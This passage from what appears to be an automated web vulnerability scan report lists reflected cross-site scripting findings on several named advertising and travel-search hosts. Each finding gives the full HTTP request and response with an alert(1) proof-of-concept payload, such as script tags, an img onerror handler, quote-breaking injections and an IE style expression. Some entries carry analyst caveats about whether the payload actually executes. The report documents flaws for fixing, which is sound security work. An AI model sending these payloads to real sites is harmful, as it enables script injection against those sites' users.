The same conditions as in 5.152 apply: the body is application/json prefixed with {}&&, without X-Content-Type-Options: nosniff, so the markup executes only if a client renders the message as HTML. Confirm that before accepting the rating.

Request

GET /xhr/shop/search?name=specificDates&summarizers=carrierStopMatrix%2CcurrencyNotice%2CsolutionList%2CitineraryPriceSlider%2CitineraryCarrierList%2CitineraryDepartureTimeRanges%2CitineraryArrivalTimeRanges%2CdurationSliderItinerary%2CitineraryOrigins%2CitineraryDestinations%2CitineraryStopCountList%2CwarningsItineraryf3f22<script>alert(1)</script>35448f73c03&format=JSON&inputs=%7B%22salesCity%22%3A%22BOS%22%2C%22slices%22%3A%5B%7B%22origins%22%3A%5B%22BOS%22%5D%2C%22destinations%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-04-30%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%2C%7B%22destinations%22%3A%5B%22BOS%22%5D%2C%22origins%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-05-18%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%5D%2C%22pax%22%3A%7B%22adults%22%3A1%7D%2C%22cabin%22%3A%22COACH%22%2C%22changeOfAirport%22%3Atrue%2C%22checkAvailability%22%3Atrue%2C%22page%22%3A%7B%22size%22%3A30%7D%2C%22sorts%22%3A%22default%22%7D HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/view/flights?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; searchFormState=%7B%22version%22%3A%220.7.20110124.2%22%2C%22json%22%3A%22%7B%5C%22mode%5C%22%3A%7B%5C%22date%5C%22%3A%5C%22exact%5C%22%2C%5C%22flightSelection%5C%22%3A%5C%22trip%5C%22%2C%5C%22flightView%5C%22%3A%5C%22trip%5C%22%2C%5C%22pageFlow%5C%22%3A%5C%22exact%5C%22%2C%5C%22trip%5C%22%3A%5C%22rt%5C%22%2C%5C%22calendarRange%5C%22%3A%5C%2230day%5C%22%7D%2C%5C%22searchForm%5C%22%3A%7B%5C%22mode%5C%22%3A%5C%22advanced%5C%22%2C%5C%22defaults%5C%22%3A%7B%5C%22multiCityRows%5C%22%3A2%7D%2C%5C%22awards%5C%22%3A%5C%22noawards%5C%22%2C%5C%22options%5C%22%3A%7B%5C%22showRoutingCodes%5C%22%3Afalse%2C%5C%22showFlightTimes%5C%22%3A%5Bfalse%2Cfalse%5D%2C%5C%22pax%5C%22%3A%5C%22simple%5C%22%7D%7D%7D%22%7D; __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.3.10.1303847824

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:59:48 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 175

{}&&{"error":{"message":"Unrecognized summarizer nickname \"warningsItineraryf3f22<script>alert(1)</script>35448f73c03\".","resultId":"c8QqCsw1Vgnge3AY10DBeB","type":"input"}}

5.155. http://matrix.itasoftware.com/xhr/shop/summarize [format parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://matrix.itasoftware.com
Path:   /xhr/shop/summarize

Issue detail

The value of the format request parameter is reflected unmodified inside a JSON string value, through the same enum lookup failure as in 5.152 ("No enum const class com.itasoftware.bbx.client.response.ResponseFormat.JSON1b93d..."). The payload 1b93d<script>alert(1)</script>a1c82177a2e was submitted in the format parameter.

As in 5.152, the body is application/json prefixed with {}&&, without X-Content-Type-Options: nosniff, so the markup is inert unless a client inserts the error text into the DOM unencoded; confirm that before accepting the rating.

Request

GET /xhr/shop/summarize?solutionSet=05INN3JQ6GZDNnhLMlbFgJ0&session=0100DBeALDQcNVSQ79mWVpW40&summarizers=solutionList&format=JSON1b93d<script>alert(1)</script>a1c82177a2e&inputs=%7B%22salesCity%22%3A%22BOS%22%2C%22slices%22%3A%5B%7B%22origins%22%3A%5B%22BOS%22%5D%2C%22destinations%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-04-30%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%2C%7B%22destinations%22%3A%5B%22BOS%22%5D%2C%22origins%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-05-18%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%5D%2C%22pax%22%3A%7B%22adults%22%3A1%7D%2C%22cabin%22%3A%22COACH%22%2C%22changeOfAirport%22%3Atrue%2C%22checkAvailability%22%3Atrue%2C%22page%22%3A%7B%22size%22%3A30%7D%2C%22sorts%22%3A%22default%22%2C%22filter%22%3A%7B%22maxStopCount%22%3A%7B%22values%22%3A%5B1%5D%7D%2C%22carriers%22%3A%7B%22values%22%3A%5B%22*%22%5D%7D%7D%7D HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/view/flights?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; searchFormState=%7B%22version%22%3A%220.7.20110124.2%22%2C%22json%22%3A%22%7B%5C%22mode%5C%22%3A%7B%5C%22date%5C%22%3A%5C%22exact%5C%22%2C%5C%22flightSelection%5C%22%3A%5C%22trip%5C%22%2C%5C%22flightView%5C%22%3A%5C%22trip%5C%22%2C%5C%22pageFlow%5C%22%3A%5C%22exact%5C%22%2C%5C%22trip%5C%22%3A%5C%22rt%5C%22%2C%5C%22calendarRange%5C%22%3A%5C%2230day%5C%22%7D%2C%5C%22searchForm%5C%22%3A%7B%5C%22mode%5C%22%3A%5C%22advanced%5C%22%2C%5C%22defaults%5C%22%3A%7B%5C%22multiCityRows%5C%22%3A2%7D%2C%5C%22awards%5C%22%3A%5C%22noawards%5C%22%2C%5C%22options%5C%22%3A%7B%5C%22showRoutingCodes%5C%22%3Afalse%2C%5C%22showFlightTimes%5C%22%3A%5Bfalse%2Cfalse%5D%2C%5C%22pax%5C%22%3A%5C%22simple%5C%22%7D%7D%7D%22%7D; __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.3.10.1303847824

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:00:33 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 132

{}&&{"error":"No enum const class com.itasoftware.bbx.client.response.ResponseFormat.JSON1b93d<script>alert(1)</script>a1c82177a2e"}

5.156. http://matrix.itasoftware.com/xhr/shop/summarize [summarizers parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://matrix.itasoftware.com
Path:   /xhr/shop/summarize

Issue detail

The value of the summarizers request parameter is reflected unmodified inside a JSON string value in the error message "Unrecognized summarizer nickname ...". The payload 4722f<script>alert(1)</script>1af6d08d9bf was submitted in the summarizers parameter.

As in 5.152 and 5.154, the body is application/json prefixed with {}&&, without X-Content-Type-Options: nosniff, so the markup executes only if a client renders the message as HTML; confirm that before accepting the rating.

Request

GET /xhr/shop/summarize?solutionSet=05INN3JQ6GZDNnhLMlbFgJ0&session=0100DBeALDQcNVSQ79mWVpW40&summarizers=solutionList4722f<script>alert(1)</script>1af6d08d9bf&format=JSON&inputs=%7B%22salesCity%22%3A%22BOS%22%2C%22slices%22%3A%5B%7B%22origins%22%3A%5B%22BOS%22%5D%2C%22destinations%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-04-30%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%2C%7B%22destinations%22%3A%5B%22BOS%22%5D%2C%22origins%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-05-18%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%5D%2C%22pax%22%3A%7B%22adults%22%3A1%7D%2C%22cabin%22%3A%22COACH%22%2C%22changeOfAirport%22%3Atrue%2C%22checkAvailability%22%3Atrue%2C%22page%22%3A%7B%22size%22%3A30%7D%2C%22sorts%22%3A%22default%22%2C%22filter%22%3A%7B%22maxStopCount%22%3A%7B%22values%22%3A%5B1%5D%7D%2C%22carriers%22%3A%7B%22values%22%3A%5B%22*%22%5D%7D%7D%7D HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/view/flights?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; searchFormState=%7B%22version%22%3A%220.7.20110124.2%22%2C%22json%22%3A%22%7B%5C%22mode%5C%22%3A%7B%5C%22date%5C%22%3A%5C%22exact%5C%22%2C%5C%22flightSelection%5C%22%3A%5C%22trip%5C%22%2C%5C%22flightView%5C%22%3A%5C%22trip%5C%22%2C%5C%22pageFlow%5C%22%3A%5C%22exact%5C%22%2C%5C%22trip%5C%22%3A%5C%22rt%5C%22%2C%5C%22calendarRange%5C%22%3A%5C%2230day%5C%22%7D%2C%5C%22searchForm%5C%22%3A%7B%5C%22mode%5C%22%3A%5C%22advanced%5C%22%2C%5C%22defaults%5C%22%3A%7B%5C%22multiCityRows%5C%22%3A2%7D%2C%5C%22awards%5C%22%3A%5C%22noawards%5C%22%2C%5C%22options%5C%22%3A%7B%5C%22showRoutingCodes%5C%22%3Afalse%2C%5C%22showFlightTimes%5C%22%3A%5Bfalse%2Cfalse%5D%2C%5C%22pax%5C%22%3A%5C%22simple%5C%22%7D%7D%7D%22%7D; __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.3.10.1303847824

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:00:34 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 170

{}&&{"error":{"message":"Unrecognized summarizer nickname \"solutionList4722f<script>alert(1)</script>1af6d08d9bf\".","resultId":"Y7zHM3VwYqoBkIJVo0DBeC","type":"input"}}

5.157. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The value of the mbox request parameter is copied into a single-quoted JavaScript string literal in a text/javascript response: it becomes the first argument of mboxFactories.get('default').get('...', 0). The payload 511dc<script>alert(1)</script>f934d3d7cbc was submitted in the mbox parameter and was echoed unmodified.

Because the body is JavaScript rather than HTML, a script tag inside the string literal is inert; this payload proves unencoded reflection, not execution. Reaching code would require closing the literal with an unescaped single quote, as the px payload in 5.160 does, and the injected code would then run in the origin of whatever page loads this URL as a script (here requested from the www.omniture.com page in the Referer). Confirm that the single quote is not escaped before treating the rating as Certain.

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1303850129880-628856&mboxPC=1303601743323-887111.17&mboxPage=1303850129880-628856&mboxCount=7&mbox=sidebar_global_phone511dc<script>alert(1)</script>f934d3d7cbc&mboxId=0&mboxTime=1303832144712&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 142
Date: Tue, 26 Apr 2011 20:59:38 GMT
Server: Test & Target

mboxFactories.get('default').get('sidebar_global_phone511dc<script>alert(1)</script>f934d3d7cbc',0).setOffer(new mboxOfferDefault()).loaded();

5.158. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The value of the mbox request parameter is copied into a single-quoted JavaScript string literal, again as the first argument of mboxFactories.get('default').get(...). The payload 1c919<img%20src%3da%20onerror%3dalert(1)>d785e4e61ef was submitted in the mbox parameter and was echoed URL-decoded as 1c919<img src=a onerror=alert(1)>d785e4e61ef.

This response has no Content-Type header at all. Inside the string literal the img element and its onerror handler are inert, so the handler fires only if a browser content-sniffs the body as HTML; the body begins with JavaScript, not markup, so that must be verified per browser rather than assumed. As in 5.157, reaching a code context requires an unescaped single quote, and the missing Content-Type (and X-Content-Type-Options: nosniff) is a defect in its own right.

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1303850129880-628856&mboxPC=1303601743323-887111.17&mboxPage=1303850129880-628856&mboxCount=12&mbox=SiteCatalyst%3A%20event1c919<img%20src%3da%20onerror%3dalert(1)>d785e4e61ef&mboxId=0&mboxTime=1303832151203&charSet=UTF-8&visitorNamespace=omniturecom&cookieLifetime=31536000&pageName=Test%26Target&currencyCode=USD&channel=Products&server=www.omniture.com&events=event69&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1095&browserHeight=937&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&prop1=Non-Customer&eVar1=Non-Customer&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&eVar7=%2B1&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&eVar17=Data%20Not%20Available&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 190
Date: Tue, 26 Apr 2011 21:03:53 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: event1c919<img src=a onerror=alert(1)>d785e4e61ef', 0).setOffer(new mboxOfferDefault()).loaded();}

5.159. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mboxId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The value of the mboxId request parameter is copied unquoted into JavaScript code as the second argument of mboxFactories.get('default').get('SiteCatalyst: event', ...). The payload d3c5f<script>alert(1)</script>9584e60e0db was submitted in the mboxId parameter and was echoed unmodified; the response again has no Content-Type header.

This is the most direct of the three omtrdc.net reflections: no quote or tag is needed to reach a code context, so any JavaScript expression supplied as mboxId executes wherever the response is loaded as a script. The script-tag payload itself only turns the response into a syntax error, so it demonstrates reflection rather than execution; confirm with a plain JavaScript expression in place of the numeric id. The server should accept only an integer here.

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1303850129880-628856&mboxPC=1303601743323-887111.17&mboxPage=1303850129880-628856&mboxCount=12&mbox=SiteCatalyst%3A%20event&mboxId=0d3c5f<script>alert(1)</script>9584e60e0db&mboxTime=1303832151203&charSet=UTF-8&visitorNamespace=omniturecom&cookieLifetime=31536000&pageName=Test%26Target&currencyCode=USD&channel=Products&server=www.omniture.com&events=event69&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1095&browserHeight=937&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&prop1=Non-Customer&eVar1=Non-Customer&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&eVar7=%2B1&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&eVar17=Data%20Not%20Available&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 187
Date: Tue, 26 Apr 2011 21:04:00 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: event', 0d3c5f<script>alert(1)</script>9584e60e0db).setOffer(new mboxOfferDefault()).loaded();}

5.160. http://p.opt.fimserve.com/bht/ [px parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://p.opt.fimserve.com
Path:   /bht/

Issue detail

The value of the px request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33802'%3balert(1)//c94ddc006d4 was submitted in the px parameter. This input was echoed as 33802';alert(1)//c94ddc006d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bht/?px=2033802'%3balert(1)//c94ddc006d4&v=1&rnd=1303843577231 HTTP/1.1
Host: p.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=4579132553189.993?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; DMEXP=4; UI="2a8dbca1b98673a117|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; ssrtb=0; LO=00GM67mfm00008f500v7

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 96
Date: Tue, 26 Apr 2011 18:46:49 GMT

var error='java.lang.NumberFormatException: For input string: "2033802';alert(1)//c94ddc006d4"';

5.161. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 78020<x%20style%3dx%3aexpression(alert(1))>7f33d133aba was submitted in the name parameter. This input was echoed as 78020<x style=x:expression(alert(1))>7f33d133aba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /serve/fb/pdc?cat=&name=landing78020<x%20style%3dx%3aexpression(alert(1))>7f33d133aba&sid=3306 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303743268_10164:0_10638:0_10640:0_10641:0_1437:0_1660:563596; uid=1_1303743268_1303179323923:6792170478871670; kwd=1_1303743268_11317:0_11717:0_11718:0_11719:0; sit=1_1303743268_719:827:0_2451:51696:46596_3236:209659:209541_782:563945:563596; cre=1_1303743268; bpd=1_1303743268; apd=1_1303743268; scg=1_1303743268; ppd=1_1303743268; afl=1_1303743268

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:03:07 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303848187_10164:104919_10638:104919_10640:104919_10641:104919_1437:104919_1660:668515; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:07 GMT; Path=/
Set-Cookie: uid=1_1303848187_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:07 GMT; Path=/
Set-Cookie: kwd=1_1303848187_11317:104919_11717:104919_11718:104919_11719:104919; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:07 GMT; Path=/
Set-Cookie: sit=1_1303848187_719:105746:104919_2451:156615:151515_3236:314578:314460_782:668864:668515; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:07 GMT; Path=/
Set-Cookie: cre=1_1303848187; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:07 GMT; Path=/
Set-Cookie: bpd=1_1303848187; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:07 GMT; Path=/
Set-Cookie: apd=1_1303848187; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:07 GMT; Path=/
Set-Cookie: scg=1_1303848187; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:07 GMT; Path=/
Set-Cookie: ppd=1_1303848187; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:07 GMT; Path=/
Set-Cookie: afl=1_1303848187; Domain=.fetchback.com; Expires=Sun, 24-Apr-2016 20:03:07 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 26 Apr 2011 20:03:07 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

<!-- campaign : 'landing78020<x style=x:expression(alert(1))>7f33d133aba' *not* found -->

5.162. http://realestate.msn.us.intellitxt.com/al.asp [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://realestate.msn.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bf287%3balert(1)//f83feec8c47 was submitted in the jscallback parameter. This input was echoed as bf287;alert(1)//f83feec8c47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /al.asp?ts=20110426184640&cc=us&hk=1&ipid=20029&mh=bd3142edfc2bce02d9fc379eee21c2c1&pvm=f67439ad677e2c9299a82dfc253295cd&pvu=014CCF305AC145B7BA348BA3CAACA02D&rcc=us&so=0&prf=ll%3A19249%7Cintl%3A41679%7Cpreprochrome%3A308%7Cgetconchrome%3A237%7Cadvint%3A42259%7Cadvl%3A42259%7Ctl%3A42259&jscallback=$iTXT.js.callback1bf287%3balert(1)//f83feec8c47 HTTP/1.1
Host: realestate.msn.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:47:18 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Tue, 26 Apr 2011 18:47:18 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1bf287;alert(1)//f83feec8c47();}catch(e){}

5.163. http://realestate.msn.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://realestate.msn.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7366'-alert(1)-'b7e52cebacd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

